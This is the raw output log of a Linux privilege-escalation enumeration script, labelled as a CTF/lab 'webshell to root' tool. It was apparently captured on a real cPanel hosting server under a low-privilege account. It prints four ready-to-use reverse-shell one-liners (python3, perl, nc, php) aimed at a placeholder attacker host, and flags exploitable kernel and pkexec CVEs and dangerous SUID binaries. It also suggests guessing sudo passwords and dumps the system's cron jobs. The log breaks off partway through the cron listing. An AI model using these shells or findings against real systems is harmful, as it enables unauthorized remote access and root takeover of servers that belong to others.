Peler

: / tmp /
Filename : d3pr2_chs01.logicit.net_1779108701.log
back
[H[2J[3J[1;32m

    ██████╗ ██████╗ ██████╗ ██████╗ ██████╗     ██╗   ██╗██╗  ██╗
    ██╔══██╗╚════██╗██╔══██╗██╔══██╗╚════██╗    ██║   ██║██║  ██║
    ██║  ██║ █████╔╝██████╔╝██████╔╝ █████╔╝    ██║   ██║███████║
    ██║  ██║ ╚═══██╗██╔═══╝ ██╔══██╗██╔═══╝     ╚██╗ ██╔╝╚════██║
    ██████╔╝██████╔╝██║     ██║  ██║███████╗      ╚████╔╝      ██║
    ╚═════╝ ╚═════╝ ╚═╝     ╚═╝  ╚═╝╚══════╝       ╚═══╝       ╚═╝

[0m
[1;36m  ╔═══════════════════════════════════════════════════════╗[0m
[1;36m  ║  [1;37mAuthor  : na3er                                    [1;36m║[0m
[1;36m  ║  [1;37mPurpose : CTF / LAB — Webshell → Root              [1;36m║[0m
[1;36m  ║  [1;37mMode    : FULL SCAN 🔎                            [1;36m║[0m
[1;36m  ║  [1;37mLog     : /tmp/d3pr2_chs01.logicit.net_1779108701.log[1;36m║[0m
[1;36m  ╚═══════════════════════════════════════════════════════╝[0m


[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
[1;32m[1m  🖥  ENVIRONMENT DETECTION[0m
[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
 [1;37m[INFO]    [0m Running as: rehab (UID: 1034)
 [1;32m[OK]      [0m Interactive TTY available
 [1;32m[OK]      [0m /tmp is writable
 [1;37m[INFO]    [0m Checking available tools...
  [1;32mAvailable: [1;37msudo find python3 perl php curl wget nc gcc make git getcap ss ip netstat arp mount df strings ltrace strace base64 openssl xxd timeout mysqladmin psql pkexec at crontab[0m
  [0;37mMissing  : python ruby ncat socat docker lxc gdb redis-cli[0m
 [1;37m[INFO]    [0m Best reverse shell options for this target:
  [1;36m▸ python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'[0m
  [1;36m▸ perl -e 'use Socket;$i="ATTACKER";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i")'[0m
  [1;36m▸ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc ATTACKER PORT >/tmp/f[0m
  [1;36m▸ php -r '$s=fsockopen("ATTACKER",PORT);exec("/bin/bash -i <&3 >&3 2>&3");'[0m
[0;37m  └─ completed in 0s[0m

[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
[1;32m[1m  ⚡ QUICK WINS — check these FIRST[0m
[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
[2m  ⏳ Checking instant wins...[0m
[0;37m  └─ completed in 10s[0m

[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
[1;32m[1m  🖥  SYSTEM & KERNEL[0m
[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
 [1;37m[INFO]    [0m User   : uid=1034(rehab) gid=1036(rehab) groups=1036(rehab)
 [1;37m[INFO]    [0m Host   : chs01.logicit.net
 [1;37m[INFO]    [0m OS     : Ubuntu 20.04.3 LTS
 [1;37m[INFO]    [0m Kernel : 5.4.0-216-generic (x86_64)
 [1;33m[MEDIUM]  [0m [1;33mKernel 5.4.0-216-generic → overlayfs (CVE-2021-3493) possible on Ubuntu[0m
 [0;37m[LOW]     [0m [0;37mKernel 5.4.0-216-generic → check Netfilter nf_tables CVE-2023-32233[0m
 [1;33m[MEDIUM]  [0m [1;33mUbuntu + Kernel 5.4.0-216-generic → GameOver(lay) CVE-2023-2640/32629[0m
 [1;37m[INFO]    [0m Sudo version: 1.8.31
 [1;33m[MEDIUM]  [0m [1;33mpkexec found (version: 0.105-26ubuntu1.3) → check PwnKit CVE-2021-4034[0m
 [0;37m[LOW]     [0m [0;37mAppArmor active[0m
 [0;37m[LOW]     [0m [0;37mUser namespaces: enabled[0m
[0;37m  └─ completed in 0s[0m

[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
[1;32m[1m  🔐 SUDO ANALYSIS[0m
[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
 [1;37m[INFO]    [0m No sudo access or sudo requires password
 [1;37m[INFO]    [0m Try: sudo -l with common passwords (password, admin, root, toor, $WHOAMI)
[0;37m  └─ completed in 0s[0m

[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
[1;32m[1m  💀 SUID / SGID BINARIES[0m
[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
[2m  ⏳ Scanning SUID files...[0m
 [1;37m[INFO]    [0m ═══ SUID Files ═══
 [0;37m[LOW]     [0m [0;37mSUID → /usr/sbin/exim[0m
 [0;37m[LOW]     [0m [0;37mSUID → /usr/sbin/suexec[0m
 [0;37m[LOW]     [0m [0;37mSUID → /usr/sbin/mount.nfs[0m
 [0;37m[LOW]     [0m [0;37mSUID → /usr/lib/openssh/ssh-keysign[0m
 [0;37m[LOW]     [0m [0;37mSUID → /usr/lib/dbus-1.0/dbus-daemon-launch-helper[0m
 [0;37m[LOW]     [0m [0;37mSUID → /usr/lib/policykit-1/polkit-agent-helper-1[0m
 [0;37m[LOW]     [0m [0;37mSUID → /usr/lib/snapd/snap-confine[0m
 [41m[1;37m CRITICAL [0m [1;31m★ Dangerous SUID → /usr/bin/crontab[0m
 [0;37m[LOW]     [0m [0;37mSUID → /usr/bin/sudo[0m
 [0;37m[LOW]     [0m [0;37mSUID → /usr/bin/quota[0m
 [0;37m[LOW]     [0m [0;37mSUID → /usr/bin/chfn[0m
 [0;37m[LOW]     [0m [0;37mSUID → /usr/bin/passwd[0m
 [41m[1;37m CRITICAL [0m [1;31m★ Dangerous SUID → /usr/bin/at[0m
 [0;37m[LOW]     [0m [0;37mSUID → /usr/bin/newgrp[0m
 [0;37m[LOW]     [0m [0;37mSUID → /usr/bin/umount[0m
 [0;37m[LOW]     [0m [0;37mSUID → /usr/bin/gpasswd[0m
 [41m[1;37m CRITICAL [0m [1;31m★ Dangerous SUID → /usr/bin/mount[0m
 [0;37m[LOW]     [0m [0;37mSUID → /usr/bin/su[0m
 [41m[1;37m CRITICAL [0m [1;31m★ Dangerous SUID → /usr/bin/pkexec[0m
 [41m[1;37m CRITICAL [0m [1;31m★ Dangerous SUID → /snap/core18/2999/bin/mount[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2999/bin/ping (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2999/bin/su (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2999/bin/umount (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2999/usr/bin/chfn (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2999/usr/bin/chsh (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2999/usr/bin/gpasswd (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2999/usr/bin/newgrp (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2999/usr/bin/passwd (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2999/usr/bin/sudo (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2999/usr/lib/dbus-1.0/dbus-daemon-launch-helper (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2999/usr/lib/openssh/ssh-keysign (owner: root)[0m
 [41m[1;37m CRITICAL [0m [1;31m★ Dangerous SUID → /snap/core18/2979/bin/mount[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2979/bin/ping (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2979/bin/su (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2979/bin/umount (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2979/usr/bin/chfn (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2979/usr/bin/chsh (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2979/usr/bin/gpasswd (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2979/usr/bin/newgrp (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2979/usr/bin/passwd (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2979/usr/bin/sudo (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2979/usr/lib/dbus-1.0/dbus-daemon-launch-helper (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core18/2979/usr/lib/openssh/ssh-keysign (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core20/2769/usr/bin/chfn (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core20/2769/usr/bin/chsh (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core20/2769/usr/bin/gpasswd (owner: root)[0m
 [41m[1;37m CRITICAL [0m [1;31m★ Dangerous SUID → /snap/core20/2769/usr/bin/mount[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core20/2769/usr/bin/newgrp (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core20/2769/usr/bin/passwd (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core20/2769/usr/bin/su (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core20/2769/usr/bin/sudo (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core20/2769/usr/bin/umount (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core20/2769/usr/lib/dbus-1.0/dbus-daemon-launch-helper (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core20/2769/usr/lib/openssh/ssh-keysign (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core20/2866/usr/bin/chfn (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core20/2866/usr/bin/chsh (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core20/2866/usr/bin/gpasswd (owner: root)[0m
 [41m[1;37m CRITICAL [0m [1;31m★ Dangerous SUID → /snap/core20/2866/usr/bin/mount[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core20/2866/usr/bin/newgrp (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core20/2866/usr/bin/passwd (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core20/2866/usr/bin/su (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core20/2866/usr/bin/sudo (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core20/2866/usr/bin/umount (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core20/2866/usr/lib/dbus-1.0/dbus-daemon-launch-helper (owner: root)[0m
 [38;5;208m[HIGH]    [0m [38;5;208mCustom/unusual SUID → /snap/core20/2866/usr/lib/openssh/ssh-keysign (owner: root)[0m
 [1;37m[INFO]    [0m Total SUID files: 65

 [1;37m[INFO]    [0m ═══ SGID Files ═══
 [0;37m[LOW]     [0m [0;37mSGID → /usr/sbin/pam_extrausers_chkpwd[0m
 [0;37m[LOW]     [0m [0;37mSGID → /usr/sbin/sendmail[0m
 [0;37m[LOW]     [0m [0;37mSGID → /usr/sbin/unix_chkpwd[0m
 [0;37m[LOW]     [0m [0;37mSGID → /usr/bin/ssh-agent[0m
 [0;37m[LOW]     [0m [0;37mSGID → /usr/bin/expiry[0m
 [0;37m[LOW]     [0m [0;37mSGID → /usr/bin/mlock[0m
 [38;5;208m[HIGH]    [0m [38;5;208mDangerous SGID → /usr/bin/at[0m
 [0;37m[LOW]     [0m [0;37mSGID → /usr/bin/chage[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core18/2999/sbin/pam_extrausers_chkpwd[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core18/2999/sbin/unix_chkpwd[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core18/2999/usr/bin/chage[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core18/2999/usr/bin/expiry[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core18/2999/usr/bin/ssh-agent[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core18/2999/usr/bin/wall[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core18/2979/sbin/pam_extrausers_chkpwd[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core18/2979/sbin/unix_chkpwd[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core18/2979/usr/bin/chage[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core18/2979/usr/bin/expiry[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core18/2979/usr/bin/ssh-agent[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core18/2979/usr/bin/wall[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core20/2769/usr/bin/chage[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core20/2769/usr/bin/expiry[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core20/2769/usr/bin/ssh-agent[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core20/2769/usr/sbin/pam_extrausers_chkpwd[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core20/2769/usr/sbin/unix_chkpwd[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core20/2866/usr/bin/chage[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core20/2866/usr/bin/expiry[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core20/2866/usr/bin/ssh-agent[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core20/2866/usr/sbin/pam_extrausers_chkpwd[0m
 [1;33m[MEDIUM]  [0m [1;33mCustom SGID → /snap/core20/2866/usr/sbin/unix_chkpwd[0m

 [1;37m[INFO]    [0m ═══ SUID Library Check ═══
 [41m[1;37m CRITICAL [0m [1;31mSUID binary with missing library → /snap/core18/2999/bin/ping[0m
  [1;31m  → 	libnettle.so.6 => not found[0m
 [41m[1;37m CRITICAL [0m [1;31mSUID binary with missing library → /snap/core18/2999/usr/lib/dbus-1.0/dbus-daemon-launch-helper[0m
  [1;31m  → /snap/core18/2999/usr/lib/dbus-1.0/dbus-daemon-launch-helper: /lib/x86_64-linux-gnu/libdbus-1.so.3: version `LIBDBUS_PRIVATE_1.12.2' not found (required by /snap/core18/2999/usr/lib/dbus-1.0/dbus-daemon-launch-helper)[0m
 [41m[1;37m CRITICAL [0m [1;31mSUID binary with missing library → /snap/core18/2999/usr/lib/openssh/ssh-keysign[0m
  [1;31m  → 	libcrypto.so.1.0.0 => not found[0m
 [41m[1;37m CRITICAL [0m [1;31mSUID binary with missing library → /snap/core18/2979/bin/ping[0m
  [1;31m  → 	libnettle.so.6 => not found[0m
 [41m[1;37m CRITICAL [0m [1;31mSUID binary with missing library → /snap/core18/2979/usr/lib/dbus-1.0/dbus-daemon-launch-helper[0m
  [1;31m  → /snap/core18/2979/usr/lib/dbus-1.0/dbus-daemon-launch-helper: /lib/x86_64-linux-gnu/libdbus-1.so.3: version `LIBDBUS_PRIVATE_1.12.2' not found (required by /snap/core18/2979/usr/lib/dbus-1.0/dbus-daemon-launch-helper)[0m
 [41m[1;37m CRITICAL [0m [1;31mSUID binary with missing library → /snap/core18/2979/usr/lib/openssh/ssh-keysign[0m
  [1;31m  → 	libcrypto.so.1.0.0 => not found[0m
[0;37m  └─ completed in 16s[0m

[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
[1;32m[1m  ⚙️  LINUX CAPABILITIES[0m
[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
[2m  ⏳ Scanning capabilities...[0m
[0;37m  └─ completed in 10s[0m

[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
[1;32m[1m  ⏰ CRON JOBS & SYSTEMD TIMERS[0m
[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
 [1;37m[INFO]    [0m ═══ Cron Files ═══
  [1;36m[/etc/crontab][0m
  [0;37m  17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly[0m
  [0;37m  25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )[0m
  [0;37m  47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )[0m
  [0;37m  52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )[0m
  [1;36m[/etc/cron.d/cpanel-dovecot-solr][0m
  [0;37m  21   3 * * * root /usr/bin/test -e /etc/cpanel-dovecot-solrdisable || /usr/local/cpanel/3rdparty/scripts/cpanel_dovecot_solr_maintenance[0m
  [0;37m  */10 * * * * root /usr/bin/test -e /etc/cpanel-dovecot-solrdisable || /usr/local/cpanel/3rdparty/scripts/cpanel_dovecot_solr_commit[0m
  [1;36m[/etc/cron.d/e2scrub_all][0m
  [0;37m  30 3 * * 0 root test -e /run/systemd/system || SERVICE_MODE=1 /usr/lib/x86_64-linux-gnu/e2fsprogs/e2scrub_all_cron[0m
  [0;37m  10 3 * * * root test -e /run/systemd/system || SERVICE_MODE=1 /sbin/e2scrub_all -A -r[0m
  [1;36m[/etc/cron.d/kcare-cron][0m
  [0;37m  50 3,7,11,15,19,23  * * * root /usr/bin/kcarectl -q --auto-update[0m
  [1;36m[/etc/cron.d/mailman][0m
  [0;37m  0 8 * * * mailman /usr/local/cpanel/scripts/restartsrv_mailman --status &> /dev/null && /usr/local/cpanel/3rdparty/bin/python2 -S /usr/local/cpanel/3rdparty/mailman/cron/checkdbs[0m
  [0;37m  0 9 * * * mailman /usr/local/cpanel/scripts/restartsrv_mailman --status &> /dev/null && /usr/local/cpanel/3rdparty/bin/python2 -S /usr/local/cpanel/3rdparty/mailman/cron/disabled[0m
  [0;37m  0 12 * * * mailman /usr/local/cpanel/scripts/restartsrv_mailman --status &> /dev/null && /usr/local/cpanel/3rdparty/bin/python2 -S /usr/local/cpanel/3rdparty/mailman/cron/senddigests[0m
  [0;37m  0 5 1 * * mailman /usr/local/cpanel/scripts/restartsrv_mailman --status &> /dev/null && /usr/local/cpanel/3rdparty/bin/python2 -S /usr/local/cpanel/3rdparty/mailman/cron/mailpasswds[0m
  [0;37m  27 3 * * * mailman /usr/local/cpanel/scripts/restartsrv_mailman --status &> /dev/null && /usr/local/cpanel/3rdparty/bin/python2 -S /usr/local/cpanel/3rdparty/mailman/cron/nightly_gzip[0m
  [0;37m  30 4 * * * mailman /usr/local/cpanel/scripts/restartsrv_mailman --status &> /dev/null && /usr/local/cpanel/3rdparty/bin/python2 -S /usr/local/cpanel/3rdparty/mailman/cron/cull_bad_shunt[0m
  [1;36m[/etc/cron.d/popularity-contest][0m
  [0;37m  4 8 * * *   root    test -x /etc/cron.daily/popularity-contest && /etc/cron.daily/popularity-contest --crond[0m
  [1;36m[/etc/cron.d/sysstat][0m
  [0;37m  5-55/10 * * * * root command -v debian-sa1 > /dev/null && debian-sa1 1 1[0m
  [0;37m  59 23 * * * root command -v debian-sa1 > /dev/null && debian-sa1 60 2[0m
  [1;36m[/etc/cron.d/wp-toolkit-update][0m
  [0;37m  0 1 * * * root sleep $((1 + RANDOM \% 5))h $((1 + RANDOM \% 60))m; /usr/local/bin/wp-toolkit update-configuration > /dev/null 2> /dev/null || /usr/local/cpanel/3rdparty/wp-toolkit/bin/wp-toolkit-installer.sh --generate-configs > /dev/null 2> /dev/null; DEBIAN_FRONTEND=noninteractive LANG=C /usr/bin/apt-get --assume-yes --no-reinstall -o Dpkg::Options::="--force-confnew" install "wp-toolkit-cpanel" > /dev/null 2> /dev/null[0m
  [1;36m[/etc/cron.daily/apport][0m
  [0;37m  [ -d /var/crash ] || exit 0[0m
  [0;37m  find /var/crash/. ! -name . -prune -type f \( \( -size 0 -a \! -name '*.upload*' -a \! -name '*.drkonqi*' \) -o -mtime +7 \) -exec rm -f -- '{}' \;[0m
  [0;37m  find /var/crash/. ! -name . -prune -type d -regextype posix-extended -regex '.*/[0-9]{12}$' \( -mtime +7 \) -exec rm -Rf -- '{}' \;[0m
  [1;36m[/etc/cron.daily/apt-compat][0m
  [0;37m  set -e[0m
  [0;37m  if [ -d /run/systemd/system ]; then[0m
  [0;37m      exit 0[0m
  [0;37m  fi[0m
  [0;37m  check_power()[0m
  [0;37m  {[0m
  [0;37m      # laptop check, on_ac_power returns:[0m
  [0;37m      #       0 (true)    System is on main power[0m
  [0;37m      #       1 (false)   System is not on main power[0m
  [0;37m      #       255 (false) Power status could not be determined[0m
  [0;37m      # Desktop systems always return 255 it seems[0m
  [0;37m      if which on_ac_power >/dev/null 2>&1; then[0m
  [0;37m          if on_ac_power; then[0m
  [0;37m              :[0m
  [0;37m          elif [ $? -eq 1 ]; then[0m
  [0;37m              return 1[0m
  [0;37m          fi[0m
  [0;37m      fi[0m
  [0;37m      return 0[0m
  [0;37m  }[0m
  [0;37m  random_sleep()[0m
  [0;37m  {[0m
  [0;37m      RandomSleep=1800[0m
  [0;37m      eval $(apt-config shell RandomSleep APT::Periodic::RandomSleep)[0m
  [0;37m      if [ $RandomSleep -eq 0 ]; then[0m
  [0;37m  	return[0m
  [0;37m      fi[0m
  [0;37m      if [ -z "$RANDOM" ] ; then[0m
  [0;37m          # A fix for shells that do not have this bash feature.[0m
  [0;37m  	RANDOM=$(( $(dd if=/dev/urandom bs=2 count=1 2> /dev/null | cksum | cut -d' ' -f1) % 32767 ))[0m
  [0;37m      fi[0m
  [0;37m      TIME=$(($RANDOM % $RandomSleep))[0m
  [0;37m      sleep $TIME[0m
  [0;37m  }[0m
  [0;37m  random_sleep[0m
  [0;37m  check_power || exit 0[0m
  [0;37m  exec /usr/lib/apt/apt.systemd.daily[0m
  [1;36m[/etc/cron.daily/bsdmainutils][0m
  [0;37m  . /etc/default/bsdmainutils[0m
  [0;37m  [ x$RUN_DAILY = xtrue ] || exit 0[0m
  [0;37m  [ -x /usr/sbin/sendmail ] || exit 0[0m
  [0;37m  if [ ! -x /usr/bin/cpp ]; then[0m
  [0;37m    echo "The cpp package is needed to run calendar."[0m
  [0;37m    exit 1[0m
  [0;37m  fi[0m
  [0;37m  /usr/bin/calendar -a[0m
  [1;36m[/etc/cron.daily/cracklib-runtime][0m
  [0;37m  set -e[0m
  [0;37m  if [ -x /usr/sbin/update-cracklib -a -r /etc/cracklib/cracklib.conf ][0m
  [0;37m  then[0m
  [0;37m      status="$(/usr/sbin/update-cracklib)"[0m
  [0;37m      if [ -n "${status}" ][0m
  [0;37m      then[0m
  [0;37m          /usr/bin/logger -p cron.info -t cracklib "updated dictionary (read/written words: ${status})."[0m
  [0;37m      else[0m
  [0;37m          /usr/bin/logger -p cron.info -t cracklib "no dictionary update necessary."[0m
  [0;37m      fi[0m
  [0;37m  fi[0m
  [0;37m  exit 0[0m
  [1;36m[/etc/cron.daily/dpkg][0m
  [0;37m  dbdir=/var/lib/dpkg[0m
  [0;37m  if cd /var/backups ; then[0m
  [0;37m      # We backup all relevant database files if any has changed, so that[0m
  [0;37m      # the rotation number always contains an internally consistent set.[0m
  [0;37m      dbchanged=no[0m
  [0;37m      dbfiles="arch status diversions statoverride"[0m
  [0;37m      for db in $dbfiles ; do[0m
  [0;37m          if ! cmp -s "dpkg.${db}.0" "$dbdir/$db"; then[0m
  [0;37m              dbchanged=yes[0m
  [0;37m              break;[0m
  [0;37m          fi[0m
  [0;37m      done[0m
  [0;37m      if [ "$dbchanged" = "yes" ] ; then[0m
  [0;37m          for db in $dbfiles ; do[0m
  [0;37m              [ -e "$dbdir/$db" ] || continue[0m
  [0;37m              cp -p "$dbdir/$db" "dpkg.$db"[0m
  [0;37m              savelog -c 7 "dpkg.$db" >/dev/null[0m
  [0;37m          done[0m
  [0;37m      fi[0m
  [0;37m      # The alternatives database is independent from the dpkg database.[0m
  [0;37m      dbalt=alternatives[0m
  [0;37m      # XXX: Ideally we'd use --warning=none instead of discarding stderr, but[0m
  [0;37m      # as of GNU tar 1.27.1, it does not seem to work reliably (see #749307).[0m
  [0;37m      if ! test -e ${dbalt}.tar.0 ||[0m
  [0;37m         ! tar -df ${dbalt}.tar.0 -C $dbdir $dbalt >/dev/null 2>&1 ;[0m
  [0;37m      then[0m
  [0;37m          tar -cf ${dbalt}.tar -C $dbdir $dbalt >/dev/null 2>&1[0m
  [0;37m          savelog -c 7 ${dbalt}.tar >/dev/null[0m
  [0;37m      fi[0m
  [0;37m  fi[0m
  [1;36m[/etc/cron.daily/logrotate][0m
  [0;37m  export TMPDIR=/var/spool/logrotate/tmp[0m
  [0;37m  if [ -d /run/systemd/system ]; then[0m
  [0;37m      exit 0[0m
  [0;37m  fi[0m
  [0;37m  if [ ! -x /usr/sbin/logrotate ]; then[0m
  [0;37m      exit 0[0m
  [0;37m  fi[0m
  [0;37m  /usr/sbin/logrotate /etc/logrotate.conf[0m
  [0;37m  EXITVALUE=$?[0m
  [0;37m  if [ $EXITVALUE != 0 ]; then[0m
  [0;37m      /usr/bin/logger -t logrotate "ALERT exited abnormally with [$EXITVALUE]"[0m
  [0;37m  fi[0m
  [0;37m  exit $EXITVALUE[0m
  [1;36m[/etc/cron.daily/man-db][0m
  [0;37m  set -e[0m
  [0;37m  if [ -d /run/systemd/system ]; then[0m
  [0;37m      # Skip in favour of systemd timer.[0m
  [0;37m      exit 0[0m
  [0;37m  fi[0m
  [0;37m  iosched_idle=[0m
  [0;37m  if ! egrep -q '(envID|VxID):.*[1-9]' /proc/self/status && \033[0m
  [0;37m     ([ ! -d /proc/vz ] || [ -d /proc/bc ]); then[0m
  [0;37m      iosched_idle='--iosched idle'[0m
  [0;37m  fi[0m
  [0;37m  if ! [ -d /var/cache/man ]; then[0m
  [0;37m      # Recover from deletion, per FHS.[0m
  [0;37m      install -d -o man -g man -m 0755 /var/cache/man[0m
  [0;37m  fi[0m
  [0;37m  if [ -d /var/cache/man ]; then[0m
  [0;37m    cd /[0m
  [0;37m    start-stop-daemon --start --pidfile /dev/null --startas /bin/sh \033[0m
  [0;37m  	--oknodo --chuid man $iosched_idle -- -c \033[0m
  [0;37m  	"find /var/cache/man -type f -name '*.gz' -atime +6 -print0 | \033[0m
  [0;37m  	 xargs -r0 rm -f"[0m
  [0;37m  fi[0m
  [0;37m  if [ -x /usr/bin/mandb ]; then[0m
  [0;37m      # --pidfile /dev/null so it always starts; mandb isn't really a daemon,[0m
  [0;37m      # but we want to start it like one.[0m
  [0;37m      start-stop-daemon --start --pidfile /dev/null \033[0m
  [0;37m  		      --startas /usr/bin/mandb --oknodo --chuid man \033[0m
  [0;37m  		      $iosched_idle \033[0m
  [0;37m  		      -- --no-purge --quiet[0m
  [0;37m  fi[0m
  [0;37m  exit 0[0m
  [1;36m[/etc/cron.daily/popularity-contest][0m
  [0;37m  set -e[0m
  [0;37m  if [ ! -f /usr/sbin/popularity-contest ]; then[0m
  [0;37m  	exit 0[0m
